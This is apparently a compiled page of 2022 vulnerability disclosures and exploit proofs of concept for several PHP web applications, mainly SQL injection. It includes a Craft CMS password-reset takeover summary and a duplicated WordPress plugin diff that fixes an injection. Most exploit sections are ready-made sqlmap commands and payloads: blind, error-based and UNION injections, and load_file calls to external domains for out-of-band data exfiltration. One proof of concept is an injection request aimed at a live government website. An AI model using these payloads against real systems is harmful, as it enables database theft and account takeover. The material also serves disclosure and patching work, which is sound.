Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.

    # Exploit Title: explore CMS  - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti

CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm

A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 allows attackers to execute arbitrary web scripts or HTML via a project title.

CVE-2022-27308

Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, the attacker must send X-Forwarded-Host to the /index.php?p=admin/actions/users/send-password-reset-email URI. NOTE: the vendor's position is that a customer can already work around this by adjusting the configuration (i.e., by not using the default configuration).

CVE-2022-29933: cms/CHANGELOG.md at develop · craftcms/cms

The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection

Timestamp:

04/08/2022 10:17:35 PM (6 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0948: Changeset 2707223 – WordPress Plugin Repository

Timestamp:

04/08/2022 10:17:35 PM (4 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

School Dormitory Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

School Dormitory Management System 1.0 SQL Injection

School Dormitory Management version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: School Dormitory Management 1.0 SQLi## Author: nu11secur1ty## Date: 05.09.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management## Description:The id parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=2' AND (SELECT 7198 FROM(SELECTCOUNT(*),CONCAT(0x716b7a6a71,(SELECT(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)## Proof and Exploit:[href](https://streamable.com/hd6xo1)

School Dormitory Management 1.0 SQL Injection

Travel Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Bobby Cooke and hyd3sec in August of 2020.

    ## Title: Travel Management System 1.0 Multiple SQLi## Author: nu11secur1ty## Date: 05.07.2022## Vendor: https://code-projects.org/author/fabian/## Software: https://code-projects.org/travel-management-system-using-php-source-code/## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079## Description:The pid, subcatid and catid parameters appear to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'was submitted in the all parameters.This payload injects a SQL sub-queries that call MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: pid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR NOT 1485=1485 AND 'nTcz'='nTcz    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: subcatid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: catid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''UNION ALL SELECTNULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)## Proof and Exploit:[href](https://streamable.com/8nroqp)

Tag

#php